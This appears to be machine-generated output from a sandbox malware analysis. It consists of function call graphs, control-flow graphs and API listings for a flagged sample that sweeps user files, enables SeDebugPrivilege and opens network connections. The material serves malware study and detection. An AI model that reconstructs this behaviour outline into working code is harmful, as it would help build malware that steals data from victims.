40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 403f7b 8958->8960 8959 403d74 15 API calls 8959->8962 8963 403bef 5 API calls 8960->8963 8961->8948 8961->8950 8961->8955 8964 402bab 2 API calls 8961->8964 8974 40fa23 8961->8974 8962->8944 8962->8953 8962->8959 8965 402bab 2 API calls 8962->8965 8966 403f63 8962->8966 8963->8945 8964->8961 8965->8962 8967 402bab 2 API calls 8966->8967 8968 403f69 8967->8968 8969 403bef 5 API calls 8968->8969 8969->8945 8972 4031e5 4 API calls 8971->8972 8973 403c01 FindClose 8972->8973 8973->8952 8975 40fa39 8974->8975 8976 410293 8975->8976 8977 405b6f 6 API calls 8975->8977 8976->8961 8978 40ffcc 8977->8978 8978->8976 8979 4040bb 12 API calls 8978->8979 8980 40ffeb 8979->8980 8981 41028c 8980->8981 8984 402b7c 2 API calls 8980->8984 9029 41027d 8980->9029 8982 402bab 2 API calls 8981->8982 8982->8976 8983 403f9e 5 API calls 8983->8981 8985 41001e 8984->8985 8986 40a423 4 API calls 8985->8986 8985->9029 8987 41004a 8986->8987 8988 4031e5 4 API calls 8987->8988 8989 41005c 8988->8989 8990 4031e5 4 API calls 8989->8990 8991 410079 8990->8991 8992 4031e5 4 API calls 8991->8992 8993 410096 8992->8993 8994 4031e5 4 API calls 8993->8994 8995 4100b0 8994->8995 8996 4031e5 4 API calls 8995->8996 8997 4100cd 8996->8997 8998 4031e5 4 API calls 8997->8998 8999 4100ea 8998->8999 9030 412516 8999->9030 9001 4100fd 9002 40642c 5 API calls 9001->9002 9003 41013e 9002->9003 9004 410142 9003->9004 9005 41019f 9003->9005 9006 40488c 5 API calls 9004->9006 9008 4031e5 4 API calls 9005->9008 9007 410151 9006->9007 9010 41019c 9007->9010 9011 404866 4 API calls 9007->9011 9022 4101bb 9008->9022 9009 41022a 9019 413a58 13 API calls 9009->9019 9010->9009 9012 40642c 5 API calls 9010->9012 9013 410163 9011->9013 9014 410201 9012->9014 9018 406c4c 6 API calls 9013->9018 9026 41018e 9013->9026 9016 410205 9014->9016 9017 41022f 9014->9017 9015 403c40 5 API calls 9015->9010 9020 4126a7 7 API calls 9016->9020 9033 4125db 9017->9033 9023 410178 9018->9023 9027 41026e 9019->9027 9020->9009 9024 4031e5 4 API calls 9022->9024 9025 406c4c 6 API calls 9023->9025 9024->9010 9025->9026 9026->9015 9028 402bab 2 API calls 9027->9028 9028->9029 9029->8983 9031 4031e5 4 API calls 9030->9031 9032 412539 9031->9032 9032->9001 9034 40488c 5 API calls 9033->9034 9035 4125ec 9034->9035 9036 41269f 9035->9036 9037 4031e5 4 API calls 9035->9037 9036->9009 9038 412609 9037->9038 9040 4031e5 4 API calls 9038->9040 9045 41268f 9038->9045 9039 403c40 5 API calls 9039->9036 9041 41262a 9040->9041 9049 412675 9041->9049 9050 4124f1 9041->9050 9043 4031e5 4 API calls 9043->9045 9045->9039 9046 412663 9048 4031e5 4 API calls 9046->9048 9047 4124f1 4 API calls 9047->9046 9048->9049 9049->9043 9051 4031e5 4 API calls 9050->9051 9052 412503 9051->9052 9052->9046 9052->9047 9239 4049dc 9240 4031e5 4 API calls 9239->9240 9241 4049ef 9240->9241 9896 40cddd 9897 405b6f 6 API calls 9896->9897 9898 40cdee 9897->9898 9899 40ce06 9898->9899 9900 413a58 13 API calls 9898->9900 9901 405b6f 6 API calls 9899->9901 9907 40ce59 9899->9907 9902 40ce00 9900->9902 9904 40ce1c 9901->9904 9903 402bab 2 API calls 9902->9903 9903->9899 9906 403d74 19 API calls 9904->9906 9904->9907 9910 40ce52 9904->9910 9905 402bab 2 API calls 9905->9907 9908 40ce45 9906->9908 9909 402bab 2 API calls 9908->9909 9908->9910 9909->9910 9910->9905 9242 40ecde 9243 412093 20 API calls 9242->9243 9244 40ecfd 9243->9244 9245 412093 20 API calls 9244->9245 9246 40ed0d 9245->9246 9250 40e8df 9251 412093 20 API calls 9250->9251 9252 40e8f8 9251->9252 9253 412093 20 API calls 9252->9253 9254 40e908 9253->9254 9261 404b22 9254->9261 9256 40e91c 9257 40e936 9256->9257 9260 40e93d 9256->9260 9268 40e944 9256->9268 9259 402bab 2 API calls 9257->9259 9259->9260 9262 402b7c 2 API calls 9261->9262 9263 404b33 9262->9263 9267 404b66 9263->9267 9277 4049b3 9263->9277 9266 402bab 2 API calls 9266->9267 9267->9256 9269 4056bf 2 API calls 9268->9269 9270 40e952 9269->9270 9271 4057df 13 API calls 9270->9271 9276 40e976 9270->9276 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9276 9276->9257 9278 4031e5 4 API calls 9277->9278 9279 4049c6 9278->9279 9279->9266 9279->9267 9280 4139de 9289 413855 9280->9289 9282 4139f1 9283 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9282->9283 9288 4139f7 9283->9288 9284 413866 58 API calls 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9288->9284 9290 4031e5 4 API calls 9289->9290 9291 413864 9290->9291 9291->9291 9916 4116e7 9917 4117ba 9916->9917 9918 4117f1 9917->9918 9919 405b6f 6 API calls 9917->9919 9920 4117d0 9919->9920 9920->9918 9921 404cbf 8 API calls 9920->9921 9922 4117eb 9921->9922 9923 402bab 2 API calls 9922->9923 9923->9918 9311 4094e7 9312 404b22 6 API calls 9311->9312 9313 4094fe 9312->9313 9314 409554 9313->9314 9315 405b6f 6 API calls 9313->9315 9316 409514 9315->9316 9317 404b22 6 API calls 9316->9317 9323 40954d 9316->9323 9319 40952d 9317->9319 9318 402bab 2 API calls 9318->9314 9320 409408 15 API calls 9319->9320 9325 409544 9319->9325 9322 40953e 9320->9322 9321 402bab 2 API calls 9321->9323 9324 402bab 2 API calls 9322->9324 9323->9318 9324->9325 9325->9321 9334 4058ea 9335 4031e5 4 API calls 9334->9335 9336 4058fd StrStrA 9335->9336 9968 40d4ea 9969 404bee 6 API calls 9968->9969 9970 40d500 9969->9970 9971 40d5a0 9970->9971 9972 404bee 6 API calls 9970->9972 9973 40d529 9972->9973 9974 404bee 6 API calls 9973->9974 9975 40d537 9974->9975 9976 404bee 6 API calls 9975->9976 9977 40d546 9976->9977 9977->9971 9978 405872 4 API calls 9977->9978 9979 40d56d 9978->9979 9980 405872 4 API calls 9979->9980 9981 40d57c 9980->9981 9982 405872 4 API calls 9981->9982 9983 40d58e 9982->9983 9984 405872 4 API calls 9983->9984 9984->9971 9985 40a3ea 9986 40374e 6 API calls 9985->9986 9987 40a403 9986->9987 9988 40a419 9987->9988 9989 4059d8 4 API calls 9987->9989 9990 40a411 9989->9990 9991 402bab 2 API calls 9990->9991 9991->9988 9374 404df3 WSAStartup 9378 4091f6 9379 404b22 6 API calls 9378->9379 9380 40920b 9379->9380 9381 409222 9380->9381 9382 409408 15 API calls 9380->9382 9383 40921c 9382->9383 9384 402bab 2 API calls 9383->9384 9384->9381 10018 4117fe 10019 404c4e 6 API calls 10018->10019 10020 411888 10019->10020 10021 404c4e 6 API calls 10020->10021 10023 411925 10020->10023 10022 4118ab 10021->10022 10022->10023 10037 4119b3 10022->10037 10025 4118c5 10026 4119b3 4 API calls 10025->10026 10027 4118d0 10026->10027 10027->10023 10028 4056bf 2 API calls 10027->10028 10029 4118fd 10028->10029 10030 405872 4 API calls 10029->10030 10031 41190a 10030->10031 10032 405872 4 API calls 10031->10032 10033 411915 10032->10033 10034 413aca 4 API calls 10033->10034 10035 41191f 10034->10035 10036 405695 2 API calls 10035->10036 10036->10023 10038 4119c6 10037->10038 10039 4119bf 10037->10039 10040 4031e5 4 API calls 10038->10040 10039->10025 10040->10039 9388 40e880 9389 41219c 14 API calls 9388->9389 9390 40e88e 9389->9390 9391 41219c 14 API calls 9390->9391 9392 40e89c 9391->9392 10104 40e48a 10105 404bee 6 API calls 10104->10105 10106 40e4d0 10105->10106 10107 40e4f4 10106->10107 10108 405872 4 API calls 10106->10108 10108->10107 9489 410390 9490 404b22 6 API calls 9489->9490 9491 4103a5 9490->9491 9492 410409 9491->9492 9493 405b6f 6 API calls 9491->9493 9496 4103ba 9493->9496 9494 410402 9495 402bab 2 API calls 9494->9495 9495->9492 9496->9494 9498 403d74 19 API calls 9496->9498 9501 4103fb 9496->9501 9497 402bab 2 API calls 9497->9494 9499 4103ee 9498->9499 9500 402bab 2 API calls 9499->9500 9499->9501 9500->9501 9501->9497 10119 40ed96 10120 4040bb 12 API calls 10119->10120 10134 40edb0 10120->10134 10121 40ef90 10122 40ef87 10123 403f9e 5 API calls 10122->10123 10123->10121 10124 405ae9 6 API calls 10124->10134 10125 412269 6 API calls 10125->10134 10126 40ef61 10129 40ef6e 10126->10129 10130 402bab 2 API calls 10126->10130 10127 402bab GetProcessHeap HeapFree 10127->10134 10128 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10128->10134 10131 40ef7c 10129->10131 10132 402bab 2 API calls 10129->10132 10130->10129 10131->10122 10133 402bab 2 API calls 10131->10133 10132->10131 10133->10122 10134->10121 10134->10122 10134->10124 10134->10125 10134->10126 10134->10127 10134->10128 10135 40ef98 10136 404c4e 6 API calls 10135->10136 10137 40efb6 10136->10137 10138 40f02a 10137->10138 10150 40f054 10137->10150 10141 404bee 6 API calls 10142 40efda 10141->10142 10143 404bee 6 API calls 10142->10143 10144 40efe9 10143->10144 10144->10138 10145 405872 4 API calls 10144->10145 10146 40f008 10145->10146 10147 405872 4 API calls 10146->10147 10148 40f01a 10147->10148 10149 405872 4 API calls 10148->10149 10149->10138 10151 40f064 10150->10151 10152 402b7c 2 API calls 10151->10152 10154 40f072 10152->10154 10153 40efca 10153->10141 10154->10153 10156 405ecd 10154->10156 10157 4059b8 4 API calls 10156->10157 10158 405edf 10157->10158 10158->10154 9508 410c98 9509 41219c 14 API calls 9508->9509 9510 410ca8 9509->9510 9511 41219c 14 API calls 9510->9511 9512 410cb5 9511->9512 9513 412093 20 API calls 9512->9513 9514 410cc9 9513->9514 10228 41249c 10229 4056bf 2 API calls 10228->10229 10230 4124aa 10229->10230 10231 4057df 13 API calls 10230->10231 10236 4124ce 10230->10236 10232 4124be 10231->10232 10233 413aca 4 API calls 10232->10233 10234 4124c8 10233->10234 10235 405695 2 API calls 10234->10235 10235->10236 9518 40f49e 9519 40f4b6 13 API calls 9518->9519 9520 40f4a8 9519->9520 9521 40929e 9522 413b28 6 API calls 9521->9522 9523 4092a4 9522->9523 9524 405b6f 6 API calls 9523->9524 9525 4092af 9524->9525 9526 4092c5 9525->9526 9527 409408 15 API calls 9525->9527 9528 4092bf 9527->9528 9529 402bab 2 API calls 9528->9529 9529->9526 10255 407fa4 10256 407fb7 10255->10256 10257 402b7c 2 API calls 10256->10257 10259 407fee 10256->10259 10258 40800d 10257->10258 10258->10259 10260 4037be 4 API calls 10258->10260 10261 40803c 10260->10261 10262 402bab 2 API calls 10261->10262 10262->10259 9566 4090aa 9567 404b22 6 API calls 9566->9567 9568 4090c1 9567->9568 9569 4090d8 9568->9569 9570 409408 15 API calls 9568->9570 9571 404b22 6 API calls 9569->9571 9572 4090d2 9570->9572 9573 4090eb 9571->9573 9574 402bab 2 API calls 9572->9574 9575 408c4d 15 API calls 9573->9575 9578 409104 9573->9578 9574->9569 9576 4090fe 9575->9576 9577 402bab 2 API calls 9576->9577 9577->9578 9585 409cae 9600 404b79 9585->9600 9587 409cc5 9588 409d27 9587->9588 9590 405b6f 6 API calls 9587->9590 9591 409d2f 9587->9591 9589 402bab 2 API calls 9588->9589 9589->9591 9592 409cec 9590->9592 9592->9588 9593 404b79 6 API calls 9592->9593 9594 409d05 9593->9594 9595 409d1e 9594->9595 9596 408c4d 15 API calls 9594->9596 9597 402bab 2 API calls 9595->9597 9598 409d18 9596->9598 9597->9588 9599 402bab 2 API calls 9598->9599 9599->9595 9601 404b22 6 API calls 9600->9601 9602 404b8a 9601->9602 9602->9587 10322 411fb3 10323 405b6f 6 API calls 10322->10323 10325 412013 10323->10325 10324 412075 10325->10324 10340 41206a 10325->10340 10341 411a8d 10325->10341 10327 402bab 2 API calls 10327->10324 10329 4056bf 2 API calls 10330 41203d 10329->10330 10331 405872 4 API calls 10330->10331 10332 41204a 10331->10332 10333 413aca 4 API calls 10332->10333 10334 412054 10333->10334 10335 405695 2 API calls 10334->10335 10336 41205a 10335->10336 10337 413a58 13 API calls 10336->10337 10338 412064 10337->10338 10339 402bab 2 API calls 10338->10339 10339->10340 10340->10327 10342 402b7c 2 API calls 10341->10342 10343 411aa3 10342->10343 10351 411f05 10343->10351 10364 404ada 10343->10364 10346 404ada 4 API calls 10347 411cad 10346->10347 10348 411f0c 10347->10348 10349 411cc0 10347->10349 10350 402bab 2 API calls 10348->10350 10367 405eb6 10349->10367 10350->10351 10351->10329 10351->10340 10353 411d3c 10354 4031e5 4 API calls 10353->10354 10362 411d7b 10354->10362 10355 411ea6 10356 4031e5 4 API calls 10355->10356 10357 411eb5 10356->10357 10358 4031e5 4 API calls 10357->10358 10359 411ed6 10358->10359 10360 405eb6 4 API calls 10359->10360 10360->10351 10361 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10361->10362 10362->10355 10362->10361 10363 405eb6 4 API calls 10362->10363 10363->10362 10365 4031e5 4 API calls 10364->10365 10366 404afd 10365->10366 10366->10346 10368 405998 4 API calls 10367->10368 10369 405ec8 10368->10369 10369->10353 9632 40f6b8 9633 41219c 14 API calls 9632->9633 9634 40f6c7 9633->9634 9635 41219c 14 API calls 9634->9635 9636 40f6d5 9635->9636 9637 41219c 14 API calls 9636->9637 9638 40f6df 9637->9638 9657 40d6bd 9658 4056bf 2 API calls 9657->9658 9659 40d6c9 9658->9659 9670 404cbf 9659->9670 9662 404cbf 8 API calls 9663 40d6f4 9662->9663 9664 404cbf 8 API calls 9663->9664 9665 40d702 9664->9665 9666 413aca 4 API calls 9665->9666 9667 40d711 9666->9667 9668 405695 2 API calls 9667->9668 9669 40d71f 9668->9669 9671 402b7c 2 API calls 9670->9671 9672 404ccd 9671->9672 9673 404ddc 9672->9673 9674 404b8f 5 API calls 9672->9674 9673->9662 9675 404ce4 9674->9675 9676 404dd4 9675->9676 9678 402b7c 2 API calls 9675->9678 9677 402bab 2 API calls 9676->9677 9677->9673 9685 404d04 9678->9685 9679 404dcc 9680 404a39 5 API calls 9679->9680 9680->9676 9681 404dc6 9682 402bab 2 API calls 9681->9682 9682->9679 9683 402b7c 2 API calls 9683->9685 9684 404b8f 5 API calls 9684->9685 9685->9679 9685->9681 9685->9683 9685->9684 9686 404a39 5 API calls 9685->9686 9687 405b6f 6 API calls 9685->9687 9688 404cbf 8 API calls 9685->9688 9689 402bab GetProcessHeap HeapFree 9685->9689 9686->9685 9687->9685 9688->9685 9689->9685 9690 40f0bf 9691 4056bf 2 API calls 9690->9691 9692 40f0c9 9691->9692 9694 404cbf 8 API calls 9692->9694 9702 40f115 9692->9702 9693 41219c 14 API calls 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9702 9702->9693

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 154 403f97-403f9d 152->154 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 189 403e30-403e4c call 405b6f 172->189 190 403e24-403e2e 172->190 173->166 186 403dfb-403e10 call 405eff 173->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->172 189->166 203 403e4e-403e6f call 403d74 call 402bab 189->203 190->166 190->189 193->162 205 403f8d 196->205 197->159 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 205->160 209->181 217->154
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFind$FirstNext
                                                                            • String ID: %s\%s$%s\*$Program Files$Windows
                                                                            • API String ID: 1690352074-2009209621
                                                                            • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                                            • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                                            • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                                            • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                                            APIs
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 3615134276-2896544425
                                                                            • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                            • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                                            • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                                            • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocateProcess
                                                                            • String ID:
                                                                            • API String ID: 1357844191-0
                                                                            • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                            • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                                            • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                                            • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                                            APIs
                                                                            • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: recv
                                                                            • String ID:
                                                                            • API String ID: 1507349165-0
                                                                            • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                            • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                            • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                            • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 231->235 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 259 406311-406317 call 402bab 257->259 260 406318-40631e 257->260 259->260 265 406320-406326 call 402bab 260->265 266 406327 260->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                                            • _wmemset.LIBCMT ref: 00406244
                                                                            • _wmemset.LIBCMT ref: 00406261
                                                                            • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: _wmemset$ErrorInformationLastToken
                                                                            • String ID: IDA$IDA
                                                                            • API String ID: 487585393-2020647798
                                                                            • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                                                            • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                                            • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                                                            • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 553 404ec7-404ec9 542->553 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 547 404ec0-404ec6 call 402bab 545->547 548 404ecb 545->548 546->545 547->553 552 404ecd-404ece 548->552 552->539 553->552
                                                                            APIs
                                                                            • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                                            • socket.WS2_32(?,?,?), ref: 00404E7A
                                                                            • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: freeaddrinfogetaddrinfosocket
                                                                            • String ID:
                                                                            • API String ID: 2479546573-0
                                                                            • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                                                            • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                                            • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                                                            • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

